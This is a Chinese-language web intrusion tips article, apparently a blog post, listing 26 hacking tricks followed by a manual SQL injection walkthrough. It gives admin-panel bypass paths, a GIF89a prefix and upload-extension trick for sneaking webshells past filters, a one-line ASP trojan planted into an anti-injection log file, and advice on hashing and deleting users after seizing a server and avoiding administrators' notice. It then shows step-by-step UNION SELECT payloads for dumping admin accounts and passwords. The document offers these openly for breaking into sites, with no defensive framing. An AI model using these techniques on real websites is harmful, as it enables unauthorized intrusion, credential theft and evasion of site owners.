滲透技巧
1.某些cms的網站設置過濾不嚴,直接在網站後面加上admin/session.asp 或 admin/left.asp 可以繞過後臺驗證直接進去後臺。
2.提下服務器之後建議抓下管理員哈希值,然後刪除所有用戶包括自己的,以後登錄這臺服務器就用管理員的賬號密碼登錄,這樣比較安全。
3.入侵網站之前連接下3389,可以連接上的話先嚐試弱口令,不行就按5次shift鍵,看看有沒有shift後門。
4.訪問後臺地址時彈出提示框“請登陸” 把地址記出來(複製不了)放到“網頁源代碼分析器”裡,選擇瀏覽器-攔截跳轉勾選--查看即可直接進入後臺。
5.突破防盜鏈系統訪問shell代碼:javascript:document.write(" ") 點擊GO即可進入shell。
6.遇到一流信息監控攔截系統時,上傳圖片木馬或是在木馬代碼最前面加上gif89a即可逃過檢測。
7.eweb編輯器後臺,增加了asp|asa|cer|php|aspx等擴展名上傳時都被過濾了,嘗試增加一個aaspsp,再上傳asp就會解析了。
8.用注入工具猜解到表段卻猜解不到字段的時候,到網站後臺右鍵查看源文件,一般賬號密碼後面的就是字段,之後在注入工具裡添加字段進行猜解即可。
9.當注入工具猜解表段,但猜解字段時提示長度超過50之類,不妨扔到穿山甲去猜解一下。
10.得知表段跟字段之後,使用SQL語句在ACCESS數據庫里加個用戶名及密碼的語句:Insert into admin(user,pwd) values('jianmei','daxia')
11.當獲得管理員密碼卻不知道管理員帳號時,到網站前臺找新聞鏈接,一般“提交者”“發佈者”的名字就是管理員的帳號了。
12.爆破ASP+IIS架設的網站web絕對路徑,假設網站主頁為:http://www.xxxxx/index.asp/?提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。
13.有的站長很懶什麼也不改,當我們得知網站的cms的時候,不妨去下載一套找找數據庫路徑,以及敏感信息,再嘗試默認相關的可利用資源。
14.菜刀裡點擊一句話木馬右鍵,選擇虛擬機終端,執行命令出現亂碼時,返回去設置編碼那裡,將默認的GB2312改為UTF-8.
15.入侵千萬別忘了ftp,試試諾口令,ftp的默認端口:21? 默認帳號密碼:test
16.破解出md5為20位結果,只需要把前三位和後一位去掉,剩餘16位拿去解密即可
17.好多網站的後臺地址是:admin_index.asp manage_login.asp
18.有時在木馬代碼里加上了gif89a,上傳成功訪問的時候卻出現了像圖片一樣的錯誤圖像,說明服務器把gif89a當做圖片來處理了,不要帶gif89a即可。問就可以了。
19.找eweb編輯器的時候,如果默認的被改了,到前臺去找圖片右鍵看下路徑,根據圖片的目錄猜eweb編輯器的目錄,後臺也是用此思路。
20.IIS註冊表全版本洩漏用戶路徑和FTP用戶名漏洞:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\?
21.掃旁站的時候,是不是想看每個站點是什麼cms呢?用軒轅劍掃描就可以顯示系統特徵。
22.網站的主站一般都很安全,這時就要旁註或C段了,但是想知道各個IP段開放了什麼端口嗎?用“啊D網絡工具包”裡面的IP端口掃描最理想了。
23.手工檢測注入點彈出“你的操作已被記錄!”之類的信息,訪問這個文件:sqlin.asp,如果存在,在注入點後面植入一句話木馬:‘excute(request("TNT"))
接著用一句話木馬客戶端連接:http://www.xxx.com/sqlin.asp,上傳木馬即可拿下shell,因為很多防注入程序都是用”sqlin.asp“這個文件名來做非法記錄的數據庫。
24.有的後臺不顯示驗證碼,往註冊表裡添加一個ceg即可突破這個困境了,把下面的代碼保存為Code.reg,雙擊導入就可以了。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
25.內網滲透時儘量少登錄3389,以免被管理員發現。
26.旁註的時候,建議挑php的站點來日,因為php站點一般都支持aspx腳本,這樣對於提權跟跨目錄都輕鬆!
手工注入
IE瀏覽器-工具-Internet選項-高級-顯示友好HTTP錯誤信息前面的勾去掉,否則不論服務器返回什麼錯誤,IE都只顯示為HTTP 500服務器錯誤,不能獲得更多的信息。
手工注入時如果網站過濾了 and 1=1? and 1=2 ,可以用xor 1=1? xor 1=2 進行判斷。
第一步:找注入點
(數字型)http://www.xxx.com/show.asp?id=7
加'?????????? 程序報錯
加and 1=1???? 返回正常頁面
加and 1=2???? 返回錯誤頁面
(字符型)http://www.xxx.com/show.asp?id=ade7
加'??????????? 程序報錯
加'and '1'='1? 返回正常頁面
加'and '1'='2? 返回錯誤頁面
新型檢測注入點的方法:
在URL地址後面加上-1,若返回的頁面和前面不同,是另一個正常的頁面,則表示存在注入漏洞,而且是數字型的注入漏洞。
在URL地址後面加上-0,若返回的頁面和之前的頁面相同,然後加上-1,返回錯誤頁面,則也表示存在注入漏洞,而且是數字型的。
如果報錯提示這個:
Microsoft JET Database Engine 錯誤 '80040e14'
語法錯誤 (操作符丟失) 在查詢表達式 'ID = 6 ord by' 中。
/fun/Function.asp,行 657
?
解明:通過 JET 引擎連接數據庫,則是 Access數據庫,通過 ODBC 引擎連接數據庫,則是 MSSQL數據庫。
?
第二步:猜字段數
語句:order by 5
如果猜6的時候返回出錯,就繼續往回猜,直到返回正確為止...
第三步:UNION命令
語句:and 1=2 union select 1,2,3,4,5--
看看哪裡可以替換,假如顯示有2,就在2這裡替換SCHEMA_NAME,見下
第三步:猜庫名
語句:and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1
第四步:猜表段
語句:and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1
注意,TABLE_SCHEMA=後面的庫名必須是hex轉換過的格式,倒數第二個1一直替換,直到爆出所有表段,然後選最可能性的那個。
第五步:猜字段
and 1=2 union select 1,COLUMN_NAME,3,4,5 from? information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1
注意,TABLE_SCHEMA=後面的表段必須是hex轉換過的格式,倒數第二個1一直替換,直到爆出所有字段,然後選最可能性的那兩個。
第六步:猜內容
語句一:and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin
首先讓程序報錯,所以在注入點後面加上 and 1=2
語句二:http://www.xxx.com/show.asp?id=-178?union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin
同樣是先讓程序報錯,在178這個參數前面加上 -
當列名帳號跟列名密碼都猜解對的時候,頁面將會顯示相對應的內容,一般的密碼都經過MD5加密了,然後去解密md5的網站去解密就可以了。
閱讀更多 隨便店 的文章
